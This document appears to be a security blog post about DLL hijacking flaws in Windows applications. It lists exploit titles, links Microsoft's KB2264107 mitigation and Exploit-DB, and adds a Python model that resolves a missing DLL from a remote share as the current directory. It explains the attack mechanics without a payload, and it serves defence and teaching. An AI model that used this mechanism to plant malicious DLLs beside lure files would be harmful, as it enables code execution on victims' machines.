- Adobe ExtendedScript Toolkit CS5 v3.5.0.52 (dwmapi.dll) DLL Hijacking Exploit

- CorelDRAW X3 v13.0.0.576 (crlrib.dll) DLL Hijacking Exploit

- Corel PHOTO-PAINT X3 v13.0.0.576 (crlrib.dll) DLL Hijacking Exploit

- Google Earth v5.1.3535.3218 (quserex.dll) DLL Hijacking Exploit

- Media Player Classic 6.4.9.1 (iacenc.dll) DLL Hijacking Exploit

- Microsoft Office PowerPoint 2007 v12.0.4518 (pp4x322.dll) DLL Hijacking Exploit

- Nullsoft Winamp 5.581 (wnaspi32.dll) DLL Hijacking Exploit

- Microsoft Visio 2010 v14.0.4514.1004 (dwmapi.dll) DLL Hijacking Exploit

Once DLL Hijack Audit Kit v2 was out, more than a hundred exploits were published worldwide within a few days, and Microsoft responded immediately by releasing a tool that blocks these attacks (a registry-controlled setting that removes the current working directory from the DLL search order).

Source: http://www.computerworld.com/s/article/9181518/Microsoft_releases_tool_to_block_DLL_load_hijacking_attacks?taxonomyId=17&pageNumber=1

The tool can be downloaded at the following link: http://support.microsoft.com/kb/2264107 (requirement: a genuine, validated operating system)

Such exploits are still being published as you read this, and it is alarming. Be careful whom you download files from, and stay safe.

For now, the fastest place to follow these exploits as they are published is Exploit-DB: http://www.exploit-db.com/local/
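What the audit kit and the exploits listed above rely on is the order in which Windows looks for a DLL that an application asks for by name, and what the Microsoft tool changes about it. The Python below is an added example, not code from the Metasploit kit or from Zero Science Lab: it models the default (SafeDllSearchMode) search order against a constructed in-memory directory layout, shows a DLL that is absent from the application and system directories being picked up from the current directory (here a remote share that also holds the playlist the victim opened, using Winamp/wnaspi32.dll from the list above), and shows the same lookup under the CWDIllegalInDllSearch values from KB2264107 (1 = block a WebDAV current directory, 2 = block any remote current directory, 0xFFFFFFFF = drop the current directory from the search entirely). All paths, file names and the KnownDLLs subset are constructed sample data, and the real loader has more detail (manifests, side-by-side, LOAD_WITH_ALTERED_SEARCH_PATH) that the model leaves out.

```python
# Added example (not Metasploit's kit or ZSL code): a model of the Windows
# DLL search order and of the KB2264107 CWDIllegalInDllSearch setting, run
# against a constructed directory layout instead of a real filesystem.

SYSTEM32 = r"C:\Windows\System32"
SYSTEM16 = r"C:\Windows\System"
WINDIR = r"C:\Windows"
PATH_DIRS = [SYSTEM32, WINDIR]                                # PATH is probed last
KNOWN_DLLS = {"kernel32.dll", "user32.dll", "ntdll.dll"}      # small sample subset

# Constructed layout: {directory: {file names}}. The application directory and
# the system directories lack wnaspi32.dll, so the search reaches the current
# directory, which here is the remote share holding the playlist the victim opened.
FS = {
    r"C:\Program Files\Winamp": {"winamp.exe", "in_mp3.dll"},
    SYSTEM32: {"kernel32.dll", "user32.dll", "ntdll.dll", "version.dll"},
    SYSTEM16: set(),
    WINDIR: set(),
    r"\\attacker\share": {"playlist.m3u", "wnaspi32.dll", "kernel32.dll", "version.dll"},
}

# CWDIllegalInDllSearch values (KB2264107)
CWD_DEFAULT, CWD_BLOCK_WEBDAV, CWD_BLOCK_REMOTE, CWD_NEVER = 0, 1, 2, 0xFFFFFFFF


def is_remote(path):
    """UNC paths: network shares and WebDAV via the Mini-Redirector."""
    return path.startswith("\\\\")


def is_webdav(path):
    """Simplification: UNC paths whose share name is DavWWWRoot count as WebDAV."""
    return is_remote(path) and "davwwwroot" in path.lower()


def cwd_allowed(cwd, policy):
    """Whether the current directory stays in the search under the given policy."""
    if policy == CWD_NEVER:
        return False
    if policy == CWD_BLOCK_REMOTE and is_remote(cwd):
        return False
    if policy == CWD_BLOCK_WEBDAV and is_webdav(cwd):
        return False
    return True


def search_order(app_dir, cwd, safe_search=True, cwd_policy=CWD_DEFAULT):
    """(slot, directory) pairs in the order the loader probes them for an
    unqualified DLL name. With SafeDllSearchMode (the default) the current
    directory comes after the system directories; with it off, right after
    the application directory."""
    system = [("system32", SYSTEM32), ("system", SYSTEM16), ("windows", WINDIR)]
    path = [("path", p) for p in PATH_DIRS]
    if safe_search:
        order = [("app", app_dir)] + system + [("cwd", cwd)] + path
    else:
        order = [("app", app_dir), ("cwd", cwd)] + system + path
    if not cwd_allowed(cwd, cwd_policy):
        order = [(slot, d) for slot, d in order if slot != "cwd"]
    return order


def resolve_dll(name, app_dir, cwd, fs=FS, **search_kwargs):
    """Where `name` would be loaded from: (directory, hijacked), or None if
    the loader finds nothing. `hijacked` is True when the hit came from the
    current-directory slot. KnownDLLs never go through the search at all."""
    name = name.lower()
    if name in KNOWN_DLLS:
        return SYSTEM32, False
    for slot, d in search_order(app_dir, cwd, **search_kwargs):
        if name in {f.lower() for f in fs.get(d, ())}:
            return d, slot == "cwd"
    return None


if __name__ == "__main__":
    winamp, share = r"C:\Program Files\Winamp", r"\\attacker\share"
    for policy in (CWD_DEFAULT, CWD_BLOCK_WEBDAV, CWD_BLOCK_REMOTE, CWD_NEVER):
        print(f"wnaspi32.dll, CWDIllegalInDllSearch={policy:#x}:",
              resolve_dll("wnaspi32.dll", winamp, share, cwd_policy=policy))
    print("version.dll, SafeDllSearchMode off:",
          resolve_dll("version.dll", winamp, share, safe_search=False))
```

The version.dll case shows why the class is mostly about libraries the application never ships: a DLL that exists in System32 is only hijackable from the current directory when SafeDllSearchMode is off, while a missing one is picked up from the current directory by default until the KB2264107 setting removes that directory from the search.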

Zero Science Lab